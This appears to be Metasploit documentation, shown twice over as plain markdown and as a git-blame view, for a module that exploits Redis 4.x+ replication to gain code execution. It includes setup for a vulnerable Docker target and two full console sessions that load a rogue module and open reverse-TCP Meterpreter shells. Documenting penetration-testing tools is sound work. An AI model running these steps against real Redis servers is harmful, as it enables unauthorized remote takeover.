documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md

## Vulnerable Application

### Description

This module exploits a replication code execution vulnerability in Redis 4.x and later.

### Installation Setup.

**Vulnerable Application Link**

- Official Docker Images

https://hub.docker.com/_/redis/

### Installation Setup.

```
docker pull redis
docker run -p 6379:6379 -d --name redis_slave redis
```

## Verification Steps

## Options

### CUSTOM

IF `CUSTOM` set to true, this exploit would generate a source code file, and
compile it to a redis module file during running, which is more undetectable.
It's only worked on linux system.

For other scenarios, such as lack of gcc, or others opreate systems, framework
could not compile the source for successful exploit, it uses the
pre-compiled redis module to accomplish this exploit.

## Scenarios

### set CUSTOM true (available only on linux)

```
msf5 exploit(multi/redis/redis_replication_cmd_exec) > options

Module options (exploit/linux/redis/redis_replication_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    127.0.0.1        yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   172.17.0.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6666             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/redis/redis_replication_cmd_exec) > set verbose false
verbose => false
msf5 exploit(multi/redis/redis_replication_cmd_exec) > exploit

[*] Started reverse TCP handler on 172.17.0.1:8080 
[*] 127.0.0.1:6379        - Compile redis module extension file
[+] 127.0.0.1:6379        - Payload  generate successful! 
[*] 127.0.0.1:6379        - Listening on 172.17.0.1:6666
[*] 127.0.0.1:6379        - Rogue server close...
[*] 127.0.0.1:6379        - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400
[!] 127.0.0.1:6379        - This exploit may require manual cleanup of './vxwqrg.so' on the target

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > 

```

### Set CUSTOM false (available on all system)

```
msf5 > use exploit/linux/redis/redis_replication_cmd_exec
msf5 exploit(linux/redis/redis_replication_cmd_exec) > options

Module options (exploit/linux/redis/redis_replication_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    false            yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6379             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226
rhosts => 172.16.6.226
msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1
srvhost => 172.16.6.1
msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666
srvport => 6666
msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1
lhost => 172.16.6.1
msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999
lport => 9999
msf5 exploit(linux/redis/redis_replication_cmd_exec) > options

Module options (exploit/linux/redis/redis_replication_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    172.16.6.226     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   172.16.6.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6666             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.6.1       yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/redis/redis_replication_cmd_exec) > exploit

[*] Started reverse TCP handler on 172.16.6.1:9999
[*] 172.16.6.226:6379     - Listening on 172.16.6.1:6666
[*] 172.16.6.226:6379     - Rogue server close...
[*] 172.16.6.226:6379     - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.16.6.226
[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800
[*] 172.16.6.226:6379     - Command Stager progress - 100.00% done (819/819 bytes)
[!] 172.16.6.226:6379     - This exploit may require manual cleanup of './wfuujx.so' on the target

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > getpid
Current pid: 173
```
fix install lines 2020-03-24 09:36:17 -04:00			`## Vulnerable Application`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
fix install lines 2020-03-24 09:36:17 -04:00			`### Description`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`This module exploits a replication code execution vulnerability in Redis 4.x and later.`

			`### Installation Setup.`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`Vulnerable Application Link`

			`- Official Docker Images`

			`https://hub.docker.com/_/redis/`

fix install lines 2020-03-24 09:36:17 -04:00			`### Installation Setup.`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			```
			`docker pull redis`
			`docker run -p 6379:6379 -d --name redis_slave redis`
			```

fix install lines 2020-03-24 09:36:17 -04:00			`## Verification Steps`

fix up spaces on options header 2020-01-16 10:52:13 -05:00			`## Options`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
fix install lines 2020-03-24 09:36:17 -04:00			`### CUSTOM`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			IF `CUSTOM` set to true, this exploit would generate a source code file, and
			`compile it to a redis module file during running, which is more undetectable.`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`It's only worked on linux system.`

Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`For other scenarios, such as lack of gcc, or others opreate systems, framework`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`could not compile the source for successful exploit, it uses the`
fix install lines 2020-03-24 09:36:17 -04:00			`pre-compiled redis module to accomplish this exploit.`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
fix install lines 2020-03-24 09:36:17 -04:00			`## Scenarios`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`### set CUSTOM true (available only on linux)`

			```
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(multi/redis/redis_replication_cmd_exec) > options`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`Module options (exploit/linux/redis/redis_replication_cmd_exec):`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`CUSTOM true yes Whether compile payload file during exploiting`
			`PASSWORD foobared no Redis password for authentication test`
			`RHOSTS 127.0.0.1 yes The target address range or CIDR identifier`
			`RPORT 6379 yes The target port (TCP)`
			`SRVHOST 172.17.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0`
			`SRVPORT 6666 yes The local port to listen on.`


			`Payload options (linux/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST 172.17.0.1 yes The listen address (an interface may be specified)`
			`LPORT 8080 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(multi/redis/redis_replication_cmd_exec) > set verbose false`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`verbose => false`
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(multi/redis/redis_replication_cmd_exec) > exploit`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`[*] Started reverse TCP handler on 172.17.0.1:8080`
			`[*] 127.0.0.1:6379 - Compile redis module extension file`
			`[+] 127.0.0.1:6379 - Payload generate successful!`
			`[*] 127.0.0.1:6379 - Listening on 172.17.0.1:6666`
			`[*] 127.0.0.1:6379 - Rogue server close...`
			`[*] 127.0.0.1:6379 - Sending command to trigger payload.`
			`[*] Sending stage (3021284 bytes) to 172.17.0.2`
			`[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400`
			`[!] 127.0.0.1:6379 - This exploit may require manual cleanup of './vxwqrg.so' on the target`

			`meterpreter > getuid`
			`Server username: uid=999, gid=999, euid=999, egid=999`
			`meterpreter >`

			```

			`### Set CUSTOM false (available on all system)`

			```
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 > use exploit/linux/redis/redis_replication_cmd_exec`
			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > options`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`Module options (exploit/linux/redis/redis_replication_cmd_exec):`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`CUSTOM false yes Whether compile payload file during exploiting`
			`PASSWORD foobared no Redis password for authentication test`
			`RHOSTS yes The target address range or CIDR identifier`
			`RPORT 6379 yes The target port (TCP)`
			`SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0`
			`SRVPORT 6379 yes The local port to listen on.`


			`Payload options (linux/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`rhosts => 172.16.6.226`
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`srvhost => 172.16.6.1`
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`srvport => 6666`
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`lhost => 172.16.6.1`
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00			`lport => 9999`
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > options`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`Module options (exploit/linux/redis/redis_replication_cmd_exec):`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`CUSTOM true yes Whether compile payload file during exploiting`
			`PASSWORD foobared no Redis password for authentication test`
			`RHOSTS 172.16.6.226 yes The target address range or CIDR identifier`
			`RPORT 6379 yes The target port (TCP)`
			`SRVHOST 172.16.6.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0`
			`SRVPORT 6666 yes The local port to listen on.`


			`Payload options (linux/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST 172.16.6.1 yes The listen address (an interface may be specified)`
			`LPORT 9999 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00			`msf5 exploit(linux/redis/redis_replication_cmd_exec) > exploit`
Add doc and enhance the module. 2019-07-20 00:17:57 +08:00
			`[*] Started reverse TCP handler on 172.16.6.1:9999`
			`[*] 172.16.6.226:6379 - Listening on 172.16.6.1:6666`
			`[*] 172.16.6.226:6379 - Rogue server close...`
			`[*] 172.16.6.226:6379 - Sending command to trigger payload.`
			`[*] Sending stage (3021284 bytes) to 172.16.6.226`
			`[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800`
			`[*] 172.16.6.226:6379 - Command Stager progress - 100.00% done (819/819 bytes)`
			`[!] 172.16.6.226:6379 - This exploit may require manual cleanup of './wfuujx.so' on the target`

			`meterpreter > getuid`
			`Server username: uid=999, gid=999, euid=999, egid=999`
			`meterpreter > getpid`
			`Current pid: 173`
fix install lines 2020-03-24 09:36:17 -04:00			```
Satify the msftidy_docs. 2020-03-28 11:43:47 +08:00